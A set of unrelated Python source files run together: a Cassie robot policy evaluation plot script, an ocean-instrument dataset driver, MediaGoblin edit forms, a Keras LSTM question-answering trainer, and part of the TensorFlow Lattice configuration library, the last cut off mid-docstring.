traj_info.reshape(-1, 9) actual_state_info = actual_state_info.reshape(-1, 9) time_log = time_log.reshape(-1, 1) l_footstep = np.array(l_footstep) r_footstep = np.array(r_footstep) x_error = np.linalg.norm(traj_info[:,0] - actual_state_info[:,0]) y_error = np.linalg.norm(traj_info[:,1] - actual_state_info[:,1]) z_error = np.linalg.norm(traj_info[:,2] - actual_state_info[:,2]) # print(traj_info.shape) # print(actual_state_info.shape) # print(time_log.shape) # return matrix of logged data return np.array([x_error, y_error, z_error]), np.array([l_footstep, r_footstep]) parser = argparse.ArgumentParser() parser.add_argument("--path", type=str, default="../../trained_models/ppo/Cassie-v0/IK_traj-aslip_aslip_joint_2048_12288_seed-10/", help="path to folder containing policy and run details") parser.add_argument("--traj_len", default=100, type=str) # timesteps once at speed to collect data parser.add_argument("--ramp_up", default=100, type=str) # timesteps for coming up to speed, before data collection starts parser.add_argument("--debug", default=False, action='store_true') parser.add_argument("--viz", default=False, action='store_true') # parser.add_argument("--eval", default=True, action="store_false", help="Whether to call policy.eval() or not") args = parser.parse_args() run_args = pickle.load(open(args.path + "experiment.pkl", "rb")) print(args.path) policy = torch.load(args.path + "actor.pt") # if args.eval: # policy.eval() # NOTE: for some reason the saved nodelta_neutral_stateest_symmetry policy needs this but it breaks all new policies... # policy.eval() data = [] footdata = [] speeds = [i/10 for i in range(21)] # 0.0 to 2.0 m/s # speeds = [i/10 for i in range(3, 4)] # 0.0 to 2.0 m/s for speed in speeds: taskspace_data, footplacement_data = eval_policy(policy, args, run_args, speed) data.append(taskspace_data) footdata.append(footplacement_data) data = np.array(data) footdata = np.array(footdata) print(data.shape) print(footdata.shape) # Center of mass position tracking error fig = plt.figure(figsize=(10,10)) ax = fig.add_subplot(111) colors = ["tab:blue", "tab:red", "tab:green"] for i in range(data.shape[0]): x_error = data[i, 0] y_error = data[i, 1] z_error = data[i, 2] if i == 0: ax.bar(i, z_error, label='z', bottom=x_error+y_error, color=colors[0]) ax.bar(i, y_error, label='y', bottom=x_error, color=colors[1]) ax.bar(i, x_error, label='x', color=colors[2]) else: ax.bar(i, z_error, bottom=x_error+y_error, color=colors[0]) ax.bar(i, y_error, bottom=x_error, color=colors[1]) ax.bar(i, x_error, color=colors[2]) ax.set_title('Average COM Tracking Error') ax.set_ylabel('Avg. Error (cm)') ax.set_xticks(np.arange(len(speeds))) ax.set_xticklabels([str(speed) for speed in speeds]) plt.legend() plt.savefig("./plots/compos_err.png") # # Foot Placement tracking error # fig2 = plt.figure(figsize=(10,10)) # ax2 = fig2.add_subplot(111) # colors = ["tab:blue", "tab:red"] # for i in range(footdata.shape[0]): # x_error = np.mean(footdata[i, 0]) # y_error = np.mean(footdata[i, 1]) # # only label once # if i == 0: # ax2.bar(i, y_error, label='y', bottom=x_error, color=colors[0]) # ax2.bar(i, x_error, label='x', color=colors[1]) # else: # ax2.bar(i, y_error, bottom=x_error, color=colors[0]) # ax2.bar(i, x_error, color=colors[1]) # ax2.set_title('Average Foot Placement Error') # ax2.set_ylabel('Avg. Error (cm)') # ax2.set_xticks(np.arange(len(speeds))) # ax2.set_xticklabels([str(speed) for speed in speeds]) # plt.legend() # plt.savefig("./plots/footpos_err.png") # plt.show() """ @package mi.dataset.driver.nutnr_j.cspp @file mi-dataset/mi/dataset/driver/nutnr_j/cspp/nutnr_j_cspp_telemetered_driver.py @author @brief Telemetered driver for the nutnr_j_cspp instrument Release notes: Initial Release """ from mi.dataset.dataset_driver import SimpleDatasetDriver from mi.dataset.dataset_parser import DataSetDriverConfigKeys from mi.dataset.parser.cspp_base import METADATA_PARTICLE_CLASS_KEY from mi.dataset.parser.nutnr_j_cspp import \ NutnrJCsppMetadataTelemeteredDataParticle, \ NutnrJCsppTelemeteredDataParticle, \ NutnrJCsppDarkTelemeteredDataParticle, \ NutnrJCsppParser, \ LIGHT_PARTICLE_CLASS_KEY, \ DARK_PARTICLE_CLASS_KEY from mi.core.versioning import version __author__ = 'jpadula' @version("15.7.2") def parse(unused, source_file_path, particle_data_handler): """ This is the method called by Uframe :param unused :param source_file_path This is the full path and filename of the file to be parsed :param particle_data_handler Java Object to consume the output of the parser :return particle_data_handler """ with open(source_file_path, 'r') as stream_handle: # create an instance of the concrete driver class defined below driver = NutnrJCsppTelemeteredDriver(unused, stream_handle, particle_data_handler) driver.processFileStream() return particle_data_handler class NutnrJCsppTelemeteredDriver(SimpleDatasetDriver): """ The nutnr_j_cspp telemetered driver class extends the SimpleDatasetDriver. """ def _build_parser(self, stream_handle): parser_config = { DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: { METADATA_PARTICLE_CLASS_KEY: NutnrJCsppMetadataTelemeteredDataParticle, LIGHT_PARTICLE_CLASS_KEY: NutnrJCsppTelemeteredDataParticle, DARK_PARTICLE_CLASS_KEY: NutnrJCsppDarkTelemeteredDataParticle } } parser = NutnrJCsppParser(parser_config, stream_handle, self._exception_callback) return parser saksham1115/mediagoblinmediagoblin/edit/forms.py1-10 # GNU MediaGoblin -- federated, autonomous media hosting # Copyright (C) 2011, 2012 MediaGoblin contributors. See AUTHORS. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see . import wtforms from jsonschema import Draft4Validator from mediagoblin.tools.text import tag_length_validator from mediagoblin.tools.translate import lazy_pass_to_ugettext as _ from mediagoblin.tools.licenses import licenses_as_choices from mediagoblin.tools.metadata import DEFAULT_SCHEMA, DEFAULT_CHECKER from mediagoblin.auth.tools import normalize_user_or_email_field class WebsiteField(wtforms.StringField): """A field that expects a website URL but adds http:// if not provided.""" def process_formdata(self, valuelist): if valuelist: data = valuelist[0] if not data.startswith((u'http://', u'https://')): data = u'http://' + data self.data = data else: super(WebsiteField, self).process_formdata(valuelist) class EditForm(wtforms.Form): title = wtforms.StringField( _('Title'), [wtforms.validators.Length(min=0, max=500)]) description = wtforms.TextAreaField( _('Description of this work'), description=_("""You can use Markdown for formatting.""")) tags = wtforms.StringField( _('Tags'), [tag_length_validator], description=_( "Separate tags by commas.")) slug = wtforms.StringField( _('Slug'), [wtforms.validators.InputRequired(message=_("The slug can't be empty"))], description=_( "The title part of this media's address. " "You usually don't need to change this.")) license = wtforms.SelectField( _('License'), [wtforms.validators.Optional(),], choices=licenses_as_choices()) class EditProfileForm(wtforms.Form): bio = wtforms.TextAreaField( _('Bio'), [wtforms.validators.Length(min=0, max=500)], description=_("""You can use Markdown for formatting.""")) url = WebsiteField( _('Website'), [wtforms.validators.Optional(), wtforms.validators.URL(message=_("This address contains errors"))], description=_("www.example.com, http://www.example.com or " "https://www.example.com")) location = wtforms.StringField(_('Hometown')) class EditAccountForm(wtforms.Form): wants_comment_notification = wtforms.BooleanField( description=_("Email me when others comment on my media")) wants_notifications = wtforms.BooleanField( description=_("Enable insite notifications about events.")) license_preference = wtforms.SelectField( _('License preference'), [ wtforms.validators.Optional(), wtforms.validators.AnyOf([lic[0] for lic in licenses_as_choices()]), ], choices=licenses_as_choices(), description=_('This will be your default license on upload forms.')) class EditAttachmentsForm(wtforms.Form): attachment_name = wtforms.StringField( 'Title') attachment_file = wtforms.FileField( 'File') class EditCollectionForm(wtforms.Form): title = wtforms.StringField( _('Title'), [wtforms.validators.Length(min=0, max=500), wtforms.validators.InputRequired(message=_("The title can't be empty"))]) description = wtforms.TextAreaField( _('Description of this collection'), description=_("""You can use Markdown for formatting.""")) slug = wtforms.StringField( _('Slug'), [wtforms.validators.InputRequired(message=_("The slug can't be empty"))], description=_( "The title part of this collection's address. " "You usually don't need to change this.")) class ChangePassForm(wtforms.Form): old_password = wtforms.PasswordField( _('Old password'), [wtforms.validators.InputRequired()], description=_( "Enter your old password to prove you own this account.")) new_password = wtforms.PasswordField( _('New password'), [wtforms.validators.InputRequired(), wtforms.validators.Length(min=6, max=30)], id="password") class ChangeEmailForm(wtforms.Form): new_email = wtforms.StringField( _('New email address'), [wtforms.validators.InputRequired(), normalize_user_or_email_field(allow_user=False)]) password = wtforms.PasswordField( _('Password'), [wtforms.validators.InputRequired()], description=_( "Enter your password to prove you own this account.")) class MetaDataValidator(object): """ Custom validator which runs form data in a MetaDataForm through a jsonschema validator and passes errors recieved in jsonschema to wtforms. :param schema The json schema to validate the data against. By default this uses the DEFAULT_SCHEMA from mediagoblin.tools.metadata. :param format_checker The FormatChecker object that limits which types jsonschema can recognize. By default this uses DEFAULT_CHECKER from mediagoblin.tools.metadata. """ def __init__(self, schema=DEFAULT_SCHEMA, format_checker=DEFAULT_CHECKER): self.schema = schema self.format_checker = format_checker def __call__(self, form, field): metadata_dict = {field.data:form.value.data} validator = Draft4Validator(self.schema, format_checker=self.format_checker) errors = [e.message for e in validator.iter_errors(metadata_dict)] if len(errors) >= 1: raise wtforms.validators.ValidationError( errors.pop()) class MetaDataForm(wtforms.Form): identifier = wtforms.StringField(_(u'Identifier'),[MetaDataValidator()]) value = wtforms.StringField(_(u'Value')) class EditMetaDataForm(wtforms.Form): media_metadata = wtforms.FieldList( wtforms.FormField(MetaDataForm, ""), ) import sys from random import shuffle import argparse import numpy as np from keras.models import Sequential from keras.layers.core import Dense, Dropout, Activation from keras.layers.recurrent import LSTM from keras.utils import np_utils, generic_utils from sklearn import preprocessing from sklearn.externals import joblib from spacy.en import English from features import get_questions_tensor_timeseries, get_answers_matrix from utils import grouper, selectFrequentAnswers def main(): parser = argparse.ArgumentParser() parser.add_argument('-num_hidden_units', type=int, default=512) parser.add_argument('-num_lstm_layers', type=int, default=2) parser.add_argument('-dropout', type=float, default=0.2) parser.add_argument('-activation', type=str, default='tanh') args = parser.parse_args() questions_train = open('../data/preprocessed/questions_train2014.txt', 'r').read().decode('utf8').splitlines() questions_lengths_train = open('../data/preprocessed/questions_lengths_train2014.txt', 'r').read().decode('utf8').splitlines() answers_train = open('../data/preprocessed/answers_train2014.txt', 'r').read().decode('utf8').splitlines() images_train = open('../data/preprocessed/images_train2014.txt', 'r').read().decode('utf8').splitlines() max_answers = 1000 questions_train, answers_train, images_train = selectFrequentAnswers(questions_train,answers_train,images_train, max_answers) print 'Loaded questions, sorting by length...' questions_lengths_train, questions_train, answers_train = (list(t) for t in zip(*sorted(zip(questions_lengths_train, questions_train, answers_train)))) #encode the remaining answers labelencoder = preprocessing.LabelEncoder() labelencoder.fit(answers_train) nb_classes = len(list(labelencoder.classes_)) joblib.dump(labelencoder,'../models/labelencoder.pkl') max_len = 30 #25 is max for training, 27 is max for validation word_vec_dim = 300 model = Sequential() model.add(LSTM(output_dim = args.num_hidden_units, activation='tanh', return_sequences=True, input_shape=(max_len, word_vec_dim))) model.add(Dropout(args.dropout)) model.add(LSTM(args.num_hidden_units, return_sequences=False)) model.add(Dense(nb_classes, init='uniform')) model.add(Activation('softmax')) json_string = model.to_json() model_file_name = '../models/lstm_language_only_num_hidden_units_' + str(args.num_hidden_units) + '_num_lstm_layers_' + str(args.num_lstm_layers) + '_dropout_' + str(args.dropout) open(model_file_name + '.json', 'w').write(json_string) print 'Compiling model...' model.compile(loss='categorical_crossentropy', optimizer='rmsprop') print 'Compilation done...' #set up word vectors nlp = English() print 'loaded word2vec features...' ## training print 'Training started...' numEpochs = 100 model_save_interval = 5 batchSize = 128 for k in xrange(numEpochs): progbar = generic_utils.Progbar(len(questions_train)) for qu_batch,an_batch,im_batch in zip(grouper(questions_train, batchSize, fillvalue=questions_train[0]), grouper(answers_train, batchSize, fillvalue=answers_train[0]), grouper(images_train, batchSize, fillvalue=images_train[0])): timesteps = len(nlp(qu_batch[-1])) #questions sorted in descending order of length X_q_batch = get_questions_tensor_timeseries(qu_batch, nlp, timesteps) Y_batch = get_answers_matrix(an_batch, labelencoder) loss = model.train_on_batch(X_q_batch, Y_batch) progbar.add(batchSize, values=[("train loss", loss)]) if k%model_save_interval == 0: model.save_weights(model_file_name + '_epoch_{:02d}.hdf5'.format(k)) model.save_weights(model_file_name + '_epoch_{:02d}.hdf5'.format(k+1)) if __name__ == "__main__": main() maresb/lattice1-10 # Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """TFL model configuration library for canned estimators. To construct a TFL canned estimator, construct a model configuration and pass it to the canned estimator constructor: ```python feature_columns = ... model_config = tfl.configs.CalibratedLatticeConfig(...) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` Supported models are: * **Calibrated linear model**: Constructed using `tfl.configs.CalibratedLinearConfig`. A calibrated linear model that applies piecewise-linear and categorical calibration on the input feature, followed by a linear combination and an optional output piecewise-linear calibration. When using output calibration or when output bounds are specified, the linear layer will apply weighted averaging on calibrated inputs. * **Calibrated lattice model**: Constructed using `tfl.configs.CalibratedLatticeConfig`. A calibrated lattice model applies piecewise-linear and categorical calibration on the input feature, followed by a lattice model and an optional output piecewise-linear calibration. * **Calibrated lattice ensemble model**: Constructed using `tfl.configs.CalibratedLatticeEnsembleConfig`. A calibrated lattice ensemble model applies piecewise-linear and categorical calibration on the input feature, followed by an ensemble of lattice models and an optional output piecewise-linear calibration. Feature calibration and per-feature configurations are set using `tfl.configs.FeatureConfig`. Feature configurations include monotonicity constraints, per-feature regularization (see `tfl.configs.RegularizerConfig`), and lattice sizes for lattice models. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy from absl import logging import tensorflow as tf _HPARAM_FEATURE_PREFIX = 'feature' _HPARAM_REGULARIZER_PREFIX = 'regularizer' class _Config(object): """Base class for configs.""" def __init__(self, kwargs): if 'self' in kwargs: kwargs.pop('self') if '__class__' in kwargs: kwargs.pop('__class__') self.__dict__ = kwargs def __repr__(self): return self.__dict__.__repr__() def get_config(self): """Returns a configuration dictionary.""" config = copy.deepcopy(self.__dict__) if 'self' in config: config.pop('self') if '__class__' in config: config.pop('__class__') if 'feature_configs' in config and config['feature_configs'] is not None: config['feature_configs'] = [ tf.keras.utils.serialize_keras_object(feature_config) for feature_config in config['feature_configs'] ] if 'regularizer_configs' in config and config[ 'regularizer_configs'] is not None: config['regularizer_configs'] = [ tf.keras.utils.serialize_keras_object(regularizer_config) for regularizer_config in config['regularizer_configs'] ] if ('reflects_trust_in' in config and config['reflects_trust_in'] is not None): config['reflects_trust_in'] = [ tf.keras.utils.serialize_keras_object(trust_config) for trust_config in config['reflects_trust_in'] ] if 'dominates' in config and config['dominates'] is not None: config['dominates'] = [ tf.keras.utils.serialize_keras_object(dominance_config) for dominance_config in config['dominates'] ] return config @classmethod def deserialize_nested_configs(cls, config, custom_objects=None): """Returns a deserialized configuration dictionary.""" config = copy.deepcopy(config) if 'feature_configs' in config and config['feature_configs'] is not None: config['feature_configs'] = [ tf.keras.utils.deserialize_keras_object( feature_config, custom_objects=custom_objects) for feature_config in config['feature_configs'] ] if 'regularizer_configs' in config and config[ 'regularizer_configs'] is not None: config['regularizer_configs'] = [ tf.keras.utils.deserialize_keras_object( regularizer_config, custom_objects=custom_objects) for regularizer_config in config['regularizer_configs'] ] if ('reflects_trust_in' in config and config['reflects_trust_in'] is not None): config['reflects_trust_in'] = [ tf.keras.utils.deserialize_keras_object( trust_config, custom_objects=custom_objects) for trust_config in config['reflects_trust_in'] ] if 'dominates' in config and config['dominates'] is not None: config['dominates'] = [ tf.keras.utils.deserialize_keras_object( dominance_config, custom_objects=custom_objects) for dominance_config in config['dominates'] ] return config class _HasFeatureConfigs(object): """Base class for configs with `feature_configs` attribute.""" def feature_config_by_name(self, feature_name): """Returns existing or default FeatureConfig with the given name.""" if self.feature_configs is None: self.feature_configs = [] for feature_config in self.feature_configs: if feature_config.name == feature_name: return feature_config feature_config = FeatureConfig(feature_name) self.feature_configs.append(feature_config) return feature_config class _HasRegularizerConfigs(object): """Base class for configs with `regularizer_configs` attribute.""" def regularizer_config_by_name(self, regularizer_name): """Returns existing or default RegularizerConfig with the given name.""" if self.regularizer_configs is None: self.regularizer_configs = [] for regularizer_config in self.regularizer_configs: if regularizer_config.name == regularizer_name: return regularizer_config regularizer_config = RegularizerConfig(regularizer_name) self.regularizer_configs.append(regularizer_config) return regularizer_config # pylint: disable=unused-argument class CalibratedLatticeEnsembleConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated lattice ensemble model applies piecewise-linear and categorical calibration on the input feature, followed by an ensemble of lattice models and an optional output piecewise-linear calibration. The ensemble structure can be one of the following and set via the lattice flag: - Expliclit list of list of features specifying features used in each submodel. - A random arrangement (also called Random Tiny Lattices, or RTL). - Crystals growing algorithm: This algorithm first constructs a prefitting model to assess pairwise interactions between features, and then uses those estimates to construct a final model that puts interacting features in the same lattice. For details see "Fast and flexible monotonic functions with ensembles of lattices", Advances in Neural Information Processing Systems, 2016. Examples: Creating a random ensemble (RTL) model: ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` You can also construct a random ensemble (RTL) using a `tfl.layers.RTL` layer so long as all features have the same lattice size: ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( lattices='rtl_layer', num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` To create a Crystals model, you will need to provide a *prefitting_input_fn* to the estimator constructor. This input_fn is used to train the prefitting model, as described above. The prefitting model does not need to be fully trained, so a few epochs should be enough. ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( lattices='crystals', # feature arrangement method num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) prefitting_input_fn = create_input_fn(num_epochs=5, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn prefitting_input_fn=prefitting_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs=None, lattices='random', num_lattices=None, lattice_rank=None, interpolation='hypercube', parameterization='all_vertices', num_terms=2, separate_calibrators=True, use_linear_combination=False, use_bias=False, regularizer_configs=None, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles', fix_ensemble_for_2d_constraints=True, random_seed=0): # pyformat: disable """Initializes a `CalibratedLatticeEnsembleConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. lattices: Should be one of the following: - String `'random'` indicating that the features in each lattice should be selected randomly - String `'rtl_layer'` indicating that the features in each lattice should be selected randomly using a `tfl.layers.RTL` layer. Note that using a `tfl.layers.RTL` layer scales better than using separate `tfl.layers.Lattice` instances for the ensemble. - String `'crystals'` to use a heuristic to construct the lattice ensemble based on pairwise feature interactions - An explicit list of list of feature names to be used in each lattice in the ensemble. num_lattices: Number of lattices in the ensemble. Must be provided if lattices are not explicitly provided. lattice_rank: Number of features in each lattice. Must be provided if lattices are not explicitly provided. interpolation: One of 'hypercube' or 'simplex' interpolation. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. parameterization: The parameterization of the lattice function class to use. A lattice function is uniquely determined by specifying its value on every lattice vertex. A parameterization scheme is a mapping from a vector of parameters to a multidimensional array of lattice vertex values. It can be one of: - String `'all_vertices'`: This is the "traditional" parameterization that keeps one scalar parameter per lattice vertex where the mapping is essentially the identity map. With this scheme, the number of parameters scales exponentially with the number of inputs to the lattice. The underlying lattices used will be `tfl.layers.Lattice` layers. - String `'kronecker_factored'`: With this parameterization, for each lattice input i we keep a collection of `num_terms` vectors each having `feature_configs[0].lattice_size` entries (note that all features must have the same lattice size). To obtain the tensor of lattice vertex values, for `t=1,2,...,num_terms` we compute the outer product of the `t'th` vector in each collection, multiply by a per-term scale, and sum the resulting tensors. Finally, we add a single shared bias parameter to each entry in the sum. With this scheme, the number of parameters grows linearly with `lattice_rank` (assuming lattice sizes and `num_terms` are held constant). Currently, only monotonicity shape constraint and bound constraint are supported for this scheme. Regularization is not currently supported. The underlying lattices used will be `tfl.layers.KroneckerFactoredLattice` layers. num_terms: The number of terms in a lattice using `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. separate_calibrators: If features should be separately calibrated for each lattice in the ensemble. use_linear_combination: If set to true, a linear combination layer will be used to combine ensemble outputs. Otherwise an averaging layer will be used. If output is bounded or output calibration is used, then this layer will be a weighted average. use_bias: If a bias term should be used for the linear combination. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. fix_ensemble_for_2d_constraints: A boolean indicating whether to add missing features to some lattices to resolve potential 2d constraint violations which require lattices from ensemble to either contain both constrained features or none of them, e.g. trapezoid trust constraint requires a lattice that has the "conditional" feature to include the "main" feature. Note that this might increase the final lattice rank. random_seed: Random seed to use for randomized lattices. """ # pyformat: enable super(CalibratedLatticeEnsembleConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLatticeEnsembleConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class CalibratedLatticeConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated lattice model applies piecewise-linear and categorical calibration on the input feature, followed by a lattice model and an optional output piecewise-linear calibration. Example: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs=None, interpolation='hypercube', parameterization='all_vertices', num_terms=2, regularizer_configs=None, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles', random_seed=0): """Initializes a `CalibratedLatticeConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. interpolation: One of 'hypercube' or 'simplex' interpolation. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. parameterization: The parameterization of the lattice function class to use. A lattice function is uniquely determined by specifying its value on every lattice vertex. A parameterization scheme is a mapping from a vector of parameters to a multidimensional array of lattice vertex values. It can be one of: - String `'all_vertices'`: This is the "traditional" parameterization that keeps one scalar parameter per lattice vertex where the mapping is essentially the identity map. With this scheme, the number of parameters scales exponentially with the number of inputs to the lattice. The underlying lattice used will be a `tfl.layers.Lattice` layer. - String `'kronecker_factored'`: With this parameterization, for each lattice input i we keep a collection of `num_terms` vectors each having `feature_configs[0].lattice_size` entries (note that all features must have the same lattice size). To obtain the tensor of lattice vertex values, for `t=1,2,...,num_terms` we compute the outer product of the `t'th` vector in each collection, multiply by a per-term scale, and sum the resulting tensors. Finally, we add a single shared bias parameter to each entry in the sum. With this scheme, the number of parameters grows linearly with `len(feature_configs)` (assuming lattice sizes and `num_terms` are held constant). Currently, only monotonicity shape constraint and bound constraint are supported for this scheme. Regularization is not currently supported. The underlying lattice used will be a `tfl.layers.KroneckerFactoredLattice` layer. num_terms: The number of terms in a lattice using `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. random_seed: Random seed to use for initialization of a lattice with `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. """ super(CalibratedLatticeConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLatticeConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class CalibratedLinearConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated linear model applies piecewise-linear and categorical calibration on the input feature, followed by a linear combination and an optional output piecewise-linear calibration. When using output calibration or when output bounds are specified, the linear layer will be apply weighted averaging on calibrated inputs. Example: ```python model_config = tfl.configs.CalibratedLinearConfig( feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs=None, regularizer_configs=None, use_bias=True, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles'): """Initializes a `CalibratedLinearConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. use_bias: If a bias term should be used for the linear combination. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. """ super(CalibratedLinearConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLinearConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) # TODO: add option for different pre-aggregation model (linear/ensemble) class AggregateFunctionConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for aggregate function learning model. An aggregate function learning model applies piecewise-linear and categorical calibration on the ragged input features, followed by an aggregation layer that aggregates the calibrated inputs. Lastly a lattice model and an optional output piecewise-linear calibration are applied. Example: ```python model_config = tfl.configs.AggregateFunctionConfig( feature_configs=[...], ) model = tfl.premade.AggregateFunction(model_config) model.compile(...) model.fit(...) model.evaluate(...) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs, regularizer_configs=None, middle_dimension=1, middle_lattice_size=2, middle_calibration=False, middle_calibration_num_keypoints=10, middle_monotonicity=None, middle_lattice_interpolation='hypercube', aggregation_lattice_interpolation='hypercube', output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='uniform'): """Initializes an `AggregateFunctionConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. middle_dimension: The number of calibrated lattices that are applied to each block. The outputs of these lattices are then averaged over the blocks, and the middle_dimension resulting numbers are then passed into the "middle" calibrated lattice. This middle lattice therefore has input dimension equal to middle_dimension. middle_lattice_size: Size of each of the middle_lattice dimensions. middle_calibration: If a piecewise-linear 